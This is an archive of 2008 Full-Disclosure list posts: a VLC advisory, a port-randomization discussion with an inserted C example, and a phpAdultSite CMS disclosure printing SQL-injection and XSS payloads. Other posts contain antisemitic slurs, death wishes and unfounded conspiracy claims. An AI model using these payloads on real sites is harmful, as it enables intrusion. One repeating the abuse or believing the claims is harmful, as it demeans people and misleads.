References: <d65cd4390809050045k7037cba7g7bb8de93e5e44f5@mail.gmail.com> <d65cd4390809050140g5c40303h7bce51edd4589db@mail.gmail.com> <d65cd4390809050141x73891019x632b5f16b63e9d57@mail.gmail.com>
Message-ID: <3fdc4e940809052331v44d8fe93h4dd7d689236c8cc1@mail.gmail.com>

Looks like it is so interesting, thanks Sowhat.

From xploitable at gmail.com Sat Sep 6 18:43:31 2008
From: xploitable at gmail.com (n3td3v)
Date: Sat, 6 Sep 2008 18:43:31 +0100
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com>
Message-ID: <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com>

On Sat, Sep 6, 2008 at 1:22 AM, n3td3v <xploitable at gmail.com> wrote:
> Here is the Marcus Sachs Youtube video, I forgot to add it
> http://www.youtube.com/watch?v=FSUPTZVlkyU
>
> Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set
> right now as a last ditch hope.
>
> We can't allow a man to go to jail for life, if the reason is only for
> Marcus Sachs to get cyber security funding and power, that's just
> sickening.
>
> http://freegary.org.uk/
>
> All the best,
>
> n3td3v
>

Hi Free Gary website,

Consider adding the Marcus Sachs Youtube video onto the Free Gary blog as a case against sending Gary to the U.S.
during the election season, which would only see Glasgow-born Gary paraded on CNN and Fox News during election coverage. :(

I would like to see what your readers think about the video and Marcus Sachs's media agenda.

http://www.youtube.com/watch?v=FSUPTZVlkyU

From one Scot to another, I wish Gary luck and best wishes to his friends and family, you have my sympathy at this difficult time.

After seeing the Youtube video, the timing and reason for fast tracking Gary is known more now than ever, and we have no doubt about Marcus Sachs and his intentions to use this fine Scottish born lad as a political baseball to score a home run.

The Scots, we stick together in times of hardships, and this is one of those times that Gary needs friends and support from the security community more than ever.

Please print these emails out for Gary to read, and download the Youtube video file onto a medium that he will be able to watch without his computer-use restriction order being breached.

Here is a tool that will allow you to do it: http://www.download.com/YouTube-Downloader/3000-2071_4-10647340.html

All the best,

n3td3v

From fernando.gont at gmail.com Sun Sep 7 05:31:48 2008
From: fernando.gont at gmail.com (Fernando Gont)
Date: Sun, 07 Sep 2008 01:31:48 -0300
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <20080904003920.d64a5495.jerome.benoit@grenouille.com>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <20080904003920.d64a5495.jerome.benoit@grenouille.com>
Message-ID: <48c35aa3.1b36640a.1c4f.080b@mx.google.com>

At 07:39 p.m. 03/09/2008, Jerome Benoit wrote:
> > We have published a revision of our IETF Internet-Draft about port
> > randomization.
> > It is available at:
> > http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt
> > (you can find the document in other fancy formats at:
> > http://www.gont.com.ar/drafts/port-randomization/index.html)
>
> Hi,
>
> I'm still wondering how much overhead algorithm #3 and #4 add ...
> Did someone do some tests?

This is a good point. Well.... in the case of algorithm #3, that depends on the hash function you use for F(). In the case of algorithm #4, that depends on the hash function you use for F() and the hash function you use for G().

FWIW, Linux implements algorithm #3, so you could measure the performance of that algorithm already.

P.S.: If you care about the performance implications, that's probably because you are issuing a large number of connection requests. In that case, algorithms #1 and #2 are probably not a choice, as they are likely to lead to a large number of connection-id collisions. And, if your connection requests are being issued to different hosts or services, algorithm #4 will have a better port reuse frequency than even the traditional BSD port selection algorithm, thus probably avoiding some collisions that you would have experienced with the traditional BSD port selection algorithm.

Thanks!
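To make the overhead question and the port reuse remark in the reply above concrete, here is an added example written for this page (not code from the Internet-Draft, from Linux, or from the author) of algorithms #3 and #4 as the draft describes them: #3 adds a per-destination offset F() to one global counter; #4 keeps a small table of counters indexed by a second hash G(), so each destination advances its own sequence. The draft leaves F() and G() open; a keyed FNV-1a over the connection tuple stands in for both here (an assumption of this example), which is exactly why the cost of either algorithm is the cost of the hash functions chosen. The comparison function shows the property mentioned in the P.S.: under #4 a connection to a second destination does not advance the first destination's sequence, while under #3 it does.

```c
/* Added example for this page, not code from the Internet-Draft, Linux or the
 * author: algorithms #3 and #4 of draft-ietf-tsvwg-port-randomization. F() and
 * G() are left open by the draft; a keyed FNV-1a stands in for both (assumption). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MIN_EPHEMERAL 1024
#define MAX_EPHEMERAL 65535
#define NUM_EPHEMERAL (MAX_EPHEMERAL - MIN_EPHEMERAL + 1)
#define TABLE_SIZE 64                /* counter slots for algorithm #4 */

typedef struct { uint32_t local_ip, remote_ip; uint16_t remote_port; } conn_key;

typedef struct {
    uint64_t secret1, secret2;       /* keys for F() and G(); random at boot in practice */
    uint32_t next_ephemeral;         /* the single global counter of algorithm #3 */
    uint16_t table[TABLE_SIZE];      /* per-slot counters of algorithm #4 */
    uint8_t  in_use[65536 / 8];      /* bitmap of local ports currently bound */
} port_state;

static int port_in_use(const port_state *s, unsigned port) { return (s->in_use[port / 8] >> (port % 8)) & 1; }
void mark_port_in_use(port_state *s, unsigned port) { s->in_use[port / 8] |= (uint8_t)(1u << (port % 8)); }

/* Keyed 64-bit FNV-1a over (secret, local IP, remote IP, remote port). */
static uint64_t keyed_hash(uint64_t secret, const conn_key *k)
{
    uint8_t buf[18];
    memcpy(buf, &secret, 8);
    memcpy(buf + 8, &k->local_ip, 4);
    memcpy(buf + 12, &k->remote_ip, 4);
    memcpy(buf + 16, &k->remote_port, 2);
    uint64_t h = 1469598103934665603ULL;
    for (size_t i = 0; i < sizeof buf; i++) { h ^= buf[i]; h *= 1099511628211ULL; }
    return h;
}

/* F(): per-destination offset into the ephemeral range. */
uint32_t f_offset(const port_state *s, const conn_key *k) { return (uint32_t)(keyed_hash(s->secret1, k) % NUM_EPHEMERAL); }
/* G(): which counter slot a destination uses (algorithm #4 only). */
unsigned g_index(const port_state *s, const conn_key *k) { return (unsigned)(keyed_hash(s->secret2, k) % TABLE_SIZE); }

/* Algorithm #3: port = min + (next_ephemeral + F()) mod num, one shared counter.
 * Returns the chosen port, or 0 when every ephemeral port is in use. */
unsigned pick_port_alg3(port_state *s, const conn_key *k)
{
    uint32_t offset = f_offset(s, k);
    for (unsigned tries = 0; tries < NUM_EPHEMERAL; tries++) {
        unsigned port = MIN_EPHEMERAL + (s->next_ephemeral + offset) % NUM_EPHEMERAL;
        s->next_ephemeral++;
        if (!port_in_use(s, port))
            return port;
    }
    return 0;
}

/* Algorithm #4: same formula, but the counter lives in table[G()], so
 * destinations in different slots advance independently. */
unsigned pick_port_alg4(port_state *s, const conn_key *k)
{
    uint32_t offset = f_offset(s, k);
    unsigned idx = g_index(s, k);
    for (unsigned tries = 0; tries < NUM_EPHEMERAL; tries++) {
        unsigned port = MIN_EPHEMERAL + (offset + s->table[idx]) % NUM_EPHEMERAL;
        s->table[idx]++;
        if (!port_in_use(s, port))
            return port;
    }
    return 0;
}

static void init_state(port_state *s)
{
    memset(s, 0, sizeof *s);
    s->secret1 = 0x0123456789abcdefULL;   /* constructed keys for the demo */
    s->secret2 = 0xfedcba9876543210ULL;
}

/* A bound port is skipped: the next value of the sequence is returned instead. */
int skips_ports_in_use(void)
{
    port_state s; init_state(&s);
    conn_key k = { 0x0a000001u, 0xc0a80101u, 80 };   /* constructed tuple */
    mark_port_in_use(&s, MIN_EPHEMERAL + f_offset(&s, &k));
    return pick_port_alg3(&s, &k) == MIN_EPHEMERAL + (f_offset(&s, &k) + 1) % NUM_EPHEMERAL;
}

/* The reuse property from the P.S.: a connection to destination B advances A's
 * sequence under #3 (shared counter) but not under #4 (B has its own slot). */
int compare_counter_behaviour(void)
{
    port_state s3, s4; init_state(&s3); init_state(&s4);
    conn_key a = { 0x0a000001u, 0xc0a80101u, 80 };   /* constructed tuples */
    conn_key b = a;
    for (b.remote_port = 443; g_index(&s4, &b) == g_index(&s4, &a); b.remote_port++) { }
    unsigned a1 = pick_port_alg4(&s4, &a); pick_port_alg4(&s4, &b);
    unsigned a2 = pick_port_alg4(&s4, &a);
    unsigned c1 = pick_port_alg3(&s3, &a); pick_port_alg3(&s3, &b);
    unsigned c2 = pick_port_alg3(&s3, &a);
    return a2 == MIN_EPHEMERAL + (a1 - MIN_EPHEMERAL + 1) % NUM_EPHEMERAL
        && c2 == MIN_EPHEMERAL + (c1 - MIN_EPHEMERAL + 2) % NUM_EPHEMERAL;
}

int main(void)
{
    printf("skips bound ports: %d, #4 keeps per-destination sequences: %d\n",
           skips_ports_in_use(), compare_counter_behaviour());
    return 0;
}
```

Swapping keyed_hash() for the hash a real stack would use (and timing pick_port_alg3() against pick_port_alg4() over a few million calls) is the measurement the question in the thread asks for; the control flow around the hash is identical in the two algorithms, so the difference is one extra hash per connection.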
Kind regards,

--
Fernando Gont
e-mail: fernando at gont.com.ar || fgont at acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

From py at gentoo.org Sun Sep 7 20:21:51 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Sun, 07 Sep 2008 21:21:51 +0200
Subject: [Full-disclosure] [ GLSA 200809-06 ] VLC: Multiple vulnerabilities
Message-ID: <48C429CF.6090307@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200809-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: VLC: Multiple vulnerabilities
Date: September 07, 2008
Bugs: #235238, #235589
ID: 200809-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
Two vulnerabilities in VLC may lead to the remote execution of arbitrary code.

Background
==========
VLC is a cross-platform media player and streaming server.

Affected packages
=================
-------------------------------------------------------------------
Package            / Vulnerable  / Unaffected
-------------------------------------------------------------------
1 media-video/vlc    < 0.8.6i-r2   >= 0.8.6i-r2

Description
===========
g_ reported the following vulnerabilities:

* An integer overflow leading to a heap-based buffer overflow in the Open() function in modules/demux/tta.c (CVE-2008-3732).
* A signedness error leading to a stack-based buffer overflow in the mms_ReceiveCommand() function in modules/access/mms/mmstu.c (CVE-2008-3794).

Impact
======
A remote attacker could entice a user to open a specially crafted file, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application.

Workaround
==========
There is no known workaround at this time.
Resolution
==========
All VLC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/vlc-0.8.6i-r2"

References
==========
[ 1 ] CVE-2008-3732
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3732
[ 2 ] CVE-2008-3794
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3794

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200809-06.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From smok3f00 at gmail.com Sun Sep 7 18:20:20 2008
From: smok3f00 at gmail.com (SmOk3)
Date: Sun, 7 Sep 2008 18:20:20 +0100
Subject: [Full-disclosure] phpAdultSite CMS flaws
Message-ID: <1f9bad3a0809071020u5d202f7et7629d0ec4a0c8d3d@mail.gmail.com>

Original article: http://www.davidsopas.com/2008/09/phpadult-cms-exploit/

phpAdultSite CMS is a PHP-based content management system for an adult pay site that fully supports MySQL. The code, layout, graphics of phpAdultSite are consistent through every single page of your site. It costs between $400 to $1100 depending on the license.

I found that this script is vulnerable to a couple of topics.
After no reply from this CMS's vendors, having sent about two emails 1 week ago, I decided to go to full disclosure.

The problem exists on the results_per_page variable. If it returns false, it gives a DB Error output in our browser, showing up path disclosure, SQL statements that may lead to SQL injections and also, it executes XSS attacks.

PoC:
index.php?&results_per_page=50'
index.php?&results_per_page=50"><script type="text/javascript">alert(/XSS vuln by DavidSopas.com/)</script>

It can be fixed with the sanitizing of the variable.

From nytrokiss at gmail.com Sun Sep 7 22:26:02 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Sun, 7 Sep 2008 14:26:02 -0700
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com>
Message-ID: <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com>

It's cheaper for them to scare people away than secure their systems!

On Sat, Sep 6, 2008 at 10:43 AM, n3td3v <xploitable at gmail.com> wrote:
> On Sat, Sep 6, 2008 at 1:22 AM, n3td3v <xploitable at gmail.com> wrote:
> > Here is the Marcus Sachs Youtube video, I forgot to add it
> > http://www.youtube.com/watch?v=FSUPTZVlkyU
> >
> > Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set
> > right now as a last ditch hope.
> >
> > We can't allow a man to go to jail for life, if the reason is only for
> > Marcus Sachs to get cyber security funding and power, that's just
> > sickening.
> >
> > http://freegary.org.uk/
> >
> > All the best,
> >
> > n3td3v
> >
>
> Hi Free Gary website,
>
> Consider adding the Marcus Sachs Youtube video onto the Free Gary blog
> as a case against sending Gary to the U.S.
> during the election season,
> which would only see Glasgow-born Gary paraded on CNN and Fox News
> during election coverage. :(
>
> I would like to see what your readers think about the video and Marcus
> Sachs's media agenda.
>
> http://www.youtube.com/watch?v=FSUPTZVlkyU
>
> From one Scot to another, I wish Gary luck and best wishes to his
> friends and family, you have my sympathy at this difficult time.
>
> After seeing the Youtube video, the timing and reason for fast
> tracking Gary is known more now than ever, and we have no doubt about
> Marcus Sachs and his intentions to use this fine Scottish born lad as
> a political baseball to score a home run.
>
> The Scots, we stick together in times of hardships, and this is one of
> those times that Gary needs friends and support from the security
> community more than ever.
>
> Please print these emails out for Gary to read, and download the
> Youtube video file onto a medium that he will be able to watch without
> his computer-use restriction order being breached.
>
> Here is a tool that will allow you to do it:
> http://www.download.com/YouTube-Downloader/3000-2071_4-10647340.html
>
> All the best,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
http://www.goldwatches.com/
From xploitable at gmail.com Sun Sep 7 22:57:11 2008
From: xploitable at gmail.com (n3td3v)
Date: Sun, 7 Sep 2008 22:57:11 +0100
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com>
Message-ID: <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com>

On Sun, Sep 7, 2008 at 10:26 PM, James Matthews <nytrokiss at gmail.com> wrote:
> It's cheaper for them to scare people away than secure their systems!
>

How much will it cost to fly him over to the U.S, keep him in prison, watered and fed? Is the U.S not already in a recession, have they really got the money to ramp up somebody's crime to give a false impression to the presidency that computer hacking needs to be a national security agenda for the next administration to worry about?.... really I don't think hackers are a national security item for a president to worry about...
All the best,

n3td3v

From xploitable at gmail.com Mon Sep 8 01:04:41 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 8 Sep 2008 01:04:41 +0100
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com>
Message-ID: <4b6ee9310809071704o75a45d6ar260ca78fa7a090ff@mail.gmail.com>

On Sun, Sep 7, 2008 at 10:57 PM, n3td3v <xploitable at gmail.com> wrote:
> really I don't think hackers are a national security item
> for a president to worry about...
>

Marcus Sachs and his cronies don't care though, they want to artificially ramp up cyber security, no matter how much the cost or disruption... to them cyber security is a national security agenda, and they want to convince the average joe it is as well. Bringing Gary Mckinnon to the U.S is a godsend gift for him. He'll be able to get Gary Mckinnon onto every television screen in the U.S during election time, influence middle America, all the areas of America he needs to convince about cyber security, get the voting public onside, a better job than he managed to do with Die Hard 4.
All the best,

n3td3v

From ureleet at gmail.com Mon Sep 8 02:28:24 2008
From: ureleet at gmail.com (Ureleet)
Date: Sun, 7 Sep 2008 21:28:24 -0400
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <4b6ee9310809071704o75a45d6ar260ca78fa7a090ff@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <4b6ee9310809071704o75a45d6ar260ca78fa7a090ff@mail.gmail.com>
Message-ID: <6158bb410809071828y2ee1a370m44eb6d628c58ad6e@mail.gmail.com>

sorry, i been on vacation. back now bitches!

n3td3v... u hav sumthing to hide? as much as i think sachs is full of it 2, it doesn't mean he wants to take over the world. u still dont know mckinnons method, which i asked u to elaborate on months ago. we're still waiting.

On Sun, Sep 7, 2008 at 8:04 PM, n3td3v <xploitable at gmail.com> wrote:
> On Sun, Sep 7, 2008 at 10:57 PM, n3td3v <xploitable at gmail.com> wrote:
>> really I don't think hackers are a national security item
>> for a president to worry about...
>>
>
> Marcus Sachs and his cronies don't care though, they want to
> artificially ramp up cyber security, no matter how much the cost or
> disruption... to them cyber security is a national security agenda,
> and they want to convince the average joe it is as well. Bringing Gary
> Mckinnon to the U.S is a godsend gift for him. He'll be able to get Gary
> Mckinnon onto every television screen in the U.S during election time,
> influence middle America, all the areas of America he needs to
> convince about cyber security, get the voting public onside, a better
> job than he managed to do with Die Hard 4.
>
> All the best,
>
> n3td3v
>
From ureleet at gmail.com Mon Sep 8 02:29:40 2008
From: ureleet at gmail.com (Ureleet)
Date: Sun, 7 Sep 2008 21:29:40 -0400
Subject: [Full-disclosure] n3td3v's dick is bigger than Gadis WAS: Google Chrome Browser Vulnerability
Message-ID: <6158bb410809071829m5bc6b0afr4bdf663932af4756@mail.gmail.com>

how teh fuck is this on topic with the subject? allow me to fix the subject line 4 u.

On Fri, Sep 5, 2008 at 4:53 PM, n3td3v <xploitable at gmail.com> wrote:
> On Fri, Sep 5, 2008 at 8:10 PM, hannibal <hannibal at switched.com> wrote:
>> We all know that Evron is a moronic jew, who cares?
>>
>
> How should the community deal with Gadi Evron emails? Should we be
> shooting for a complete ban of cyber politics as well as normal
> politics which is already banned?
>
> If people want to talk cyber politics then the community could set up a
> cyber-politics mailing list so we can rant to each other all day about
> cyber politics.
>
> And it would get Gadi Evron and n3td3v off Full-Disclosure, and that's
> got to be a good thing.
>
> All the best,
>
> n3td3v
>

From ureleet at gmail.com Mon Sep 8 02:30:23 2008
From: ureleet at gmail.com (Ureleet)
Date: Sun, 7 Sep 2008 21:30:23 -0400
Subject: [Full-disclosure] Monthly Hands-On Meetups
In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com>
References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com>
Message-ID: <6158bb410809071830w2418cb3aqfbb5b5c34d9572fe@mail.gmail.com>

so u just want to meet n3td3v and flog him publicly? sounds good.
On Sun, Aug 31, 2008 at 5:19 PM, Professor Micheal Chatner <mchatner at gmail.com> wrote:
> Hey Guys,
>
> I was wondering if anyone would like to start something like a
> Full-Disclosure monthly group in cities all over the world. It could
> be like 2600 meetings except with real security professionals because
> personally I don't want to even talk to someone unless they have a CEH
> cert.
>
> I just started a new job in digital forensics. It would be fun to meet
> other people who like hacking and trading Ubuntu tips and tricks!
>
> Let me know what you think!
> Professor Micheal Chatner, M.D., CISSP
>

From ureleet at gmail.com Mon Sep 8 02:38:52 2008
From: ureleet at gmail.com (Ureleet)
Date: Sun, 7 Sep 2008 21:38:52 -0400
Subject: [Full-disclosure] security news on cnet???
In-Reply-To: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com>
References: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com>
Message-ID: <6158bb410809071838r51c2e993rb3d2b0b652f115e7@mail.gmail.com>

is that okay for a writer to take vacation you fucktard? die.

On Tue, Sep 2, 2008 at 2:07 PM, n3td3v <xploitable at gmail.com> wrote:
> you've not posted any security news all week, what's going on cnet??? is
> the journalist that does the security news off ill???
>
> :(
>
> yours,
>
> cnet fan
>
> --
> https://groups.google.com/group/n3td3v
>
From ureleet at gmail.com Mon Sep 8 02:40:12 2008
From: ureleet at gmail.com (Ureleet)
Date: Sun, 7 Sep 2008 21:40:12 -0400
Subject: [Full-disclosure] die
In-Reply-To: <4b6ee9310809021533i4c4b8d01l822b7520dcecc6e3@mail.gmail.com>
References: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> <C4E2F93B.15AC79%maillists@thelonecoder.com> <4b6ee9310809021533i4c4b8d01l822b7520dcecc6e3@mail.gmail.com>
Message-ID: <6158bb410809071840x43e38fe7oa6b0ff699fd63b68@mail.gmail.com>

waaaaaaaaa. marc's penis is bigger than mine. i cant figure out youtube to upload my own video of a speech... waaaaaaaa... oh yeah, thats cause i am not invited to give speeches like marc.... waaaaaaaa...

--n3td3v

On Tue, Sep 2, 2008 at 6:33 PM, n3td3v <xploitable at gmail.com> wrote:
> On Tue, Sep 2, 2008 at 10:07 PM, Stephen Johnson
> <maillists at thelonecoder.com> wrote:
>>
>>> Subject: Re: [Full-disclosure] die
>>>
>>>
>>>> Who do you think you are, Gadi Evron or something? Don't tell people what to
>>>> do.
>>>>
>>>
>>> Who do you think you are, Gadi Evron or something? Don't tell people what to
>>> do.
>>
>> Firefox has detected that the server is redirecting the request for this
>> address in a way that will never complete
>>
>
> As long as Marcus Sachs doesn't make cyber security a national
> security agenda as the next administration is coming in. n3td3v saw
> that as a real threat to other countries' national security,
> specifically the United Kingdom, and as such I am on false flag alert.
> I'm convinced Marcus Sachs is hungry for power in Washington to do
> with cyber security.
>
> I think that's what was behind his senseless domain name reportage on
> the Sans Diary, he wanted to put cyber security in front of the next
> administration as it is coming in.
> He thought Gustav was gonna be a
> major cat 4, cat 5 hurricane and thought this is a perfect way to put
> cyber security in front of the next administration as they are
> coming in. Unfortunately for him his postings of domain names just
> turned into an alert board for the cyber criminals and helped them in
> knowing which domains not to use in cyber attacks. Plus the hurricane
> ended up making landfall on the Gulf Coast as a cat 2, cat 1
> hurricane, so made his attempts to artificially ramp up cyber security
> as a national security agenda a damp squid.
>
> Although there is a flaw in his thinking, why make something a
> national security agenda when it isn't one? And that's what worries me.
> Why not let it naturally be a national security agenda or not be a
> natural national security agenda, why do you need to ramp something up
> to be a national security agenda when it isn't one?
>
> Cyber security isn't a national security agenda, but folks like Marcus
> Sachs want it to be one, so he can gain control of "cyber" in
> Washington.
>
> This is what i'm afraid of and Marcus Sachs and whoever he is related
> to need to be watched closely, I seen that Youtube video as a real
> threat and i'm keeping a close eye on him and any future dialog he
> outputs into the security community and wider world.
>
> Gadi Evron is small fry in comparison to Marcus Sachs, although Gadi
> is power hungry and could become a national security threat, he isn't
> right now, the real concern is that of Marcus Sachs and the Cnet News
> Youtube clip that mentions he or people he has obviously been having
> discussions with behind the scenes are wanting to artificially ramp up
> cyber security in timing with Obama or McCain getting into the White
> House, either so Marcus Sachs or his associates can A) Grab front
> focus power for the next four years, B) Get funding for various
> "projects" they deem as important.
>
> When you've got big leaders talking about influencing the next
> administration as they are coming in to a bunch of folks at Black Hat
> 2008, it really sends alarm bells ringing, I just hope the guy is
> being wiretapped.
>
> Sure, Gadi Evron is power hungry, but there are bigger fish to fry...
> Marcus Sachs.
>
> http://www.youtube.com/watch?v=FSUPTZVlkyU
>
> We need to get the full video of the Youtube video link i've posted
> above put online, does Cnet News have the full video of the
> presentation? If so post it onto Youtube.
>
> Also, if Blackhat.com have the full video of the presentation, please
> post it online.
>
> Can everyone keep an eye on
> https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html#Sachs
> and email me when and if the full video appears there, we need to
> track this guy and keep an eye on him.
>
> If I ever get into MI5, i'll be focusing all my efforts on Sachs, so I
> hope the people who do work in MI5 keep an eye on Sachs in the run up
> to the election and beyond.
>
> Gadi is only causing collateral damage right now, by him pumping out
> about Estonia and Georgia being blamed on Russia and the news
> journalists believing that, when really both of those incidents were
> the work of the U.S government.
>
> The other governments can put up with Gadi's bot net claims and what
> appears in the media because of him, because it's not really his fault
> unless the CIA have leaned on Mossad, to lean on Gadi Evron, to post
> on the internet who is to blame for Estonia, Georgia and whatever else
> Sachs and company may have planned to artificially ramp up cyber
> security as a national security agenda as the next president is coming
> in, (See Youtube video for Marcus Sachs quotes).
>
> All the best,
>
> n3td3v
>
From ureleet at gmail.com Mon Sep 8 02:41:29 2008
From: ureleet at gmail.com (Ureleet)
Date: Sun, 7 Sep 2008 21:41:29 -0400
Subject: [Full-disclosure] [funsec] Internet attacks against Georgian web sites
In-Reply-To: <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com>
References: <20080818090256.4DD352003D@mailserver7.hushmail.com> <8f1f7b60808180543w18ce6ddasb2944db0a3298533@mail.gmail.com> <11005.1219073952@turing-police.cc.vt.edu> <1219077827.8558.51.camel@hextic-desktop> <48A9B2CA.4010602@fred.net> <1219090531.6511.0.camel@hextic-desktop> <4b6ee9310808281233x6132b469i1f9d035d25eb3639@mail.gmail.com> <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com>
Message-ID: <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com>

drink yourself to death. thank you.

On Thu, Aug 28, 2008 at 3:42 PM, n3td3v <xploitable at gmail.com> wrote:
> On Thu, Aug 28, 2008 at 8:33 PM, n3td3v <xploitable at gmail.com> wrote:
>> Putin blames US for Georgia role
>>
>> Russian Prime Minister Vladimir Putin has accused the US of provoking
>> the conflict in Georgia, possibly for domestic election purposes.
>>
>> Mr Putin told CNN US citizens were "in the area" during the conflict
>> over South Ossetia and were "taking direct orders from their leaders".
>>
>> He said his defence officials had told him the provocation was to
>> benefit one of the US presidential candidates.
>>
>> The White House dismissed the allegations as "not rational".
>>
>> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm
>>
>
> "The suspicion arises that someone in the United States especially
> created this conflict with the aim of making the situation more tense
> and creating a competitive advantage for one of the candidates
> fighting for the post of US president."
>
> White House spokeswoman Dana Perino rejected the allegation.
>
> "To suggest that the United States orchestrated this on behalf of a
> political candidate - it sounds not rational," she said.
>
> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm
>

From biz.marqee at gmail.com Mon Sep 8 05:26:34 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Mon, 8 Sep 2008 14:26:34 +1000
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com>
Message-ID: <a741a45f0809072126n3646512budd1adfb65e13474e@mail.gmail.com>

While I think the US/media is making too much out of this (he was just some sucker scanning for Administrator/NULL and installing pcanywhere) I don't see why we should care too much, he is a nobody - just some overaged kiddie with a scanner and some downloaded exez. He didn't use any skill and as best I can tell (from the media) he didn't access anything interesting except for an image of a UFO (of which, surprise surprise, he has no proof).

Stop trying to turn him into the next mitnick, the community won't rally around some dumbfuck whose skill set is limited to some prebuilt programs he prob got from zoneh forums.

Eat shit and die,
b1zm4rq

On Sun, Sep 7, 2008 at 3:43 AM, n3td3v <xploitable at gmail.com> wrote:
> On Sat, Sep 6, 2008 at 1:22 AM, n3td3v <xploitable at gmail.com> wrote:
> > Here is the Marcus Sachs Youtube video, I forgot to add it
> > http://www.youtube.com/watch?v=FSUPTZVlkyU
> >
> > Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set
> > right now as a last ditch hope.
> >
> > We can't allow a man to go to jail for life, if the reason is only for
> > Marcus Sachs to get cyber security funding and power, that's just
> > sickening.
> >
> > http://freegary.org.uk/
> >
> > All the best,
> >
> > n3td3v
> >
>
> Hi Free Gary website,
>
